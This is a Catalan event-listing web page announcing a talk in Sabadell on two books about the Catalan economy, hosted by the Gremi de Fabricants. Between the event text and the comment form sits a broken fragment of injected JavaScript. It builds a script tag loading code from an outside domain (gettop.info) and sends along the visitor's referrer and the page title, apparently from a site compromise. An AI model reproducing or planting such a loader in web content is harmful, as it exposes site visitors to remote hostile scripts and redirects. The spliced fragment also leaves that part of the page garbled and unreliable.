Activitats

L’economia catalana en dos llibres

  • DATA: El 12 de novembre a les 19:00
  • LOCALITAT: Sabadell
  • ADREÇA: Gremi de Fabricants, C/ Sant Quirze, 30
  • PREU: Preu a consultar
  • ORGANITZA: Gremi de Fabricants
  • MÉS INFO: Pàgina

 

L’acte comptarà amb la presència del Miquel Puig i el Guillem López Casanovas, membres del Consell Assessor de la Fundació per la Indústria, els quals ens parlaran de la temàtica general que recullen els seus dos darrers llibres: Un bon país no és un país low cost i El bienestar desigual.

Llegir tota la informació a Via Empresa

} else {

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);}

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>